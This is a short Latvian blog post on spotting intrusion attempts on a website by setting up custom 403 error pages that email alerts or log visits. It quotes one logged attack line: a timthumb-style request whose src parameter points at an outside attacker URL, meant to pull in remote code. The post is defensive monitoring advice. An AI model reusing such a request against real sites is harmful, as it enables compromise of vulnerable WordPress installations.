Kā uzzināt, vai Tavā lapā cenšas ielauzties svešinieks – hakeris?

Iespējams hakeris nav īstais vārds, bet ar to vismaz lielākā daļa saprot – nevēlamu apmeklētāju (cilvēku vai robotu), kurš cenšas sabojāt mājas lapu.

Pēc pēdējā twitter ieraksta, uz e-pastu saņēmu jautājums par to, kā es uzzināju, ka mani cenšās uzhakot.

Es savām mājas lapām un noteiktu kļūdu paziņojumiem esmu uzlicis e-pastu paziņojumu. Piemērs no mēģinājuma izmantot timthumb.php :

217.64.195.207 tried to access: http://loco.local//wp-content/gd-star-rating/?src=http://wordpress.com.prolinkirc.org/index6.php

Paziņojumā ir vēl virkne detaļu, kuras te nepublicēšu.

Kā nosūtīt sev ziņojumu par neatļautu mēģinājumu iekļūt mājas lapā?

Piemērs būs par kļūdu 403 – pieeja liegta (HTTP Error 403).

Piemērā redzamais paziņojums atnāk gadījumos, kad kāds mēģina piekļūt mana bloga administrācijas panelim vai aizsargātie failiem.  Esmu izveidojis specializētas kļūdu lapas, kuras apmeklējot tiek nosūtīts ziņojums vai tas tiek ierakstīts žurnālā vēlākai izpētei. Neieteiktu e-pastu sūtījumus likt kļūdas “404 – lapa nav atrasta” gadījumā, tā e-pasts drīz vien būs pilns, sevišķi, ja esat mainījuši mājas lapas struktūru vai dažos gadījumos hostinga serverus.

Iesaku arī izveidot sev specializētās kļūdu lapas, kas palīdzēs labāk nodrošināt monitoringu mājas lapai.

Nobeigumam. Augstāk minētais nenodrošina 100% aizsardzību, jo pilnīgākai aizsardzībai nepieciešams arī drošs hostings un labi veidota mājas lapa.

Izsakies arī Tu